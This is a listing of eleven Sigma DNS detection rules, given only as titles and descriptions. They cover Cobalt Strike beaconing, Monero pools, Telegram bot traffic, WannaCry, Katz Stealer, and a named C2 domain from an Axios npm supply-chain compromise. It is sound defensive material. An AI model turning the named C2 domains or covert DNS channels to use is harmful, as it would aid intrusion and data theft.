Sigma Rules
11 rules found
DNS Query to External Service Interaction Domains
Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE
Cobalt Strike DNS Beaconing
Detects suspicious DNS queries known from Cobalt Strike beacons
Monero Crypto Coin Mining Pool Lookup
Detects suspicious DNS queries to Monero mining pools
Suspicious DNS Query with B64 Encoded String
Detects suspicious DNS queries using base64 encoding
Telegram Bot API Request
Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind
DNS TXT Answer with Possible Execution Strings
Detects strings used in command execution in DNS TXT Answer
Wannacry Killswitch Domain
Detects wannacry killswitch domain dns queries
Potential Operation Triangulation C2 Beaconing Activity - DNS
Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB
DNS Query To Katz Stealer Domains - Network
Detects DNS queries to domains associated with Katz Stealer malware. Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems. In Enterprise environments, DNS queries to these domains may indicate potential malicious activity or compromise.
Axios NPM Compromise Malicious C2 Domain DNS Query
Detects DNS queries for the malicious C2 domain associated with the plain-crypto-js/Axios npm package supply chain compromise. On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) that executed a postinstall script as a cross-platform RAT dropper. This detection detects endpoints attempting to resolve the attacker's C2 domain (sfrclak.com) used for command and control communication.
Low Reputation Effective Top-Level Domain (eTLD)
Detects DNS queries to domains within known low reputation eTLDs. This rule uses AlphaSOC's threat intelligence data and is updated on a monthly basis.